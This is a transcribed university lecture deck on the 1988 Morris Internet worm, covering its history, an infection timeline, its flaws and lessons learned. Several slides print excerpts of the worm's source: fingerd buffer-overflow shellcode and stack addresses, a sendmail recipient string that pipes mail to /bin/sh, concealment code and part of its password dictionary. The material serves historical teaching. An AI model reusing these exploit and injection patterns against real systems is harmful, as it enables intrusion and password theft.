The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “...
-
Upload
catherine-johns -
Category
Documents
-
view
214 -
download
0
Transcript of The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “...
![Page 1: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/1.jpg)
The Internet Worm of 1988
Svetlana V. Drachova-StrangClemson University
CPSC 681April 25, 2006
“ There may be a virus loose on the internet “Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988
![Page 2: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/2.jpg)
Creator and His Creation
November 2nd, 1988: Robert Tappan Morris, 23-year old cs student from Cornell released a worm from MIT.
Aside: son of Robert Morris, Sr. Chief Scientist at the National Computer Security Center, subdivision of NSA
The Morris worm: Consisted of several files of cleverly-written C code
Intentions: Probe the size of Internet with a self-replicating program ?
Effects: -- Internet down -- Thousands of machines disconnected from Internet -- Worm on the loose
![Page 3: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/3.jpg)
What the worm DID NOT do:
Did not cause physical damage to computer systems.
Did not alter or destroy system or user files
Did not affect machines running OSs other than VAX or BSD Unix
Did not save or transmit the cracked passwords
Did not attempt to gain superuser access
Did not plant any trojans or timebombs
Did not attack machines that were not attached to the internet
![Page 4: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/4.jpg)
What the worm DID:
Self-propagated through Internet infecting and reinfecting machines
Self-replicated unstoppably
Explored several vulnerabilities: fingerd, sendmail, passwords
Had flaws that made it especially destructive, and/or impaired the intended functionality
Cracked user passwords
Disguised itself by several clever means
![Page 5: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/5.jpg)
History and Origins
“Worms were good at first”: Noble usage
1975: “tapeworm” John Brunner’s The Shockwave Rider
early 1980s: John Shoch, Jon Hupp created five worms for executing helpful tasks on the internet: billboard worm, vampire worm, etc.: “ a useful way to run distributed diagnostics”
Mishap and the first lesson learned
Conclusions
We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machineto machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored… (J. Shoch, J. Hupp)
![Page 6: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/6.jpg)
The Horrible Night
6:00 PM The Worm is launched
8:49 PM The Worm infects a VAX-8600 at the University of Utah
9:09 PM The Worm initiates the first attack to infect others
9:21 PM Load average on the system reaches 5 (sh be 1)
9:41 PM Load average reaches 7
10:01 PM Load average reaches 16
10:06 PM No new processes can be started. System unusable
10:20 PM System administrator kills off the worms
10:41 PM System is reinfected, load average reaches 27 10:49 PM System administrator shuts down and restarts the system
11:21 PM Reinfestation causes load average to reach 37.
![Page 7: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/7.jpg)
fingerd Vulnerability Exploited
fingerd has a 512 char buffer
worm calls write() with 536 char + newline argument 6 words overwrite system stack including return PC, that makes a system call version of execve(“/bin/sh”) that installs the worm on the target system.
char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003 \320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351";
/* Rewrite part of the stack frame */ l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; l568 = 0x28000000; l552 = 0x0001c020;
#ifdef sun /* Reverse the word order for the Sun machines*/ l556 = byte_swap(l556); l560 = byte_swap(l560); l564 = byte_swap(l564); l568 = byte_swap(l568); l552 = byte_swap(l552);#endif sun
write(s, buf, sizeof(buf)); /* sizeof == 536 */ write(s, XS("\n"), 1); sleep(5); if (test_connection(s, s, 10)) {
*fd1 = s; *fd2 = s;return 1; }
![Page 8: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/8.jpg)
sendmail Vulnerability Exploited
TCP flaw - DEBUG flag allows to send mail to a process instead of user.
Worm sends message with DEBUG flad to a cleverly built recepient,
String sets up command deleting header, passes body to command interpreter. It will compile code that opens a connection and gets a copy of the worm
#define MAIL_FROM "mail from:</dev/null>\n"#define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n"
send_text(s, XS(MAIL_FROM)); sprintf(l548, XS(MAIL_RCPT), i, i);send_text(s, l548); send_text(s, XS("data\n")); compile_slave(host, s, saddr); send_text(s, XS("\n.\n")); send_text(s, XS("quit\n"));
![Page 9: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/9.jpg)
Password Cracking
Exploited 2 vulnerabilities:
System: /etc/passwd file
User: weak passwords
Attack has 4 stages:
0: seek other machines to infect from /etc/hosts.equiv and /.rhosts
1: obvious password guesses (35% success)
2: worm’s internal dictionary
3: system’s online dictionary in /usr/dict/words
![Page 10: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/10.jpg)
Worm’s dictionary
char *wds[ ] = /* 0x21a74 */
{"academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander", "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals", "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur", "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas", "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater", "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl", "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess", "campanile", "cantor", "cardinal",
. . . "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato", "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle", "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo", "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting", "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard", "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman", 0
};
/* contained 421 words*/
![Page 11: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/11.jpg)
Concealing Itself
Rename itself to sh, which is also the name of the Bourne shell
strcpy(argv[0], XS("sh"));
Set core dump size to zero:
rl.rlim_cur = 0;rl.rlim_max = 0;if (setrlimit(RLIMIT_CORE, &rl)) ;
Deleting parent process and manipulating process id
Used encryption
![Page 12: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/12.jpg)
Oops, … The Worm Had Flaws
Major flaws in the program code:
only ≈14% chance that the worm will check if the target system has already been infected
1 in 7 chance (instead of 1 in 10,000) that listening worm will not listen for a pleasequit() signal
Used TCP socket command sendto instead of the UDP send to send 1B of data from each machine to the originating Berkely machine 128.32.137.13 port 11357 There were other flaws as well
![Page 13: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/13.jpg)
Worm Map
[from http://snowplow.org/tom/worm/history.html]
![Page 14: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/14.jpg)
Complex Logic of the Worm
![Page 15: The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth.](https://reader031.fdocuments.in/reader031/viewer/2022013011/56649e4e5503460f94b444ef/html5/thumbnails/15.jpg)
Lessons Learned
The Morris Worm was the first worm to bring Internet down
Worm is a powerful tool capable of inflicting a lot of damage
Computer crime is punishable under the Computer Fraud and Abuse Act of 1986.
Later Mr. Morris himself stated that the incident “has raised the public awareness to a considerable degree”. [R H Morris, quoted in the New York Times 11/5/88].
System administrators increased their efforts in protecting their systems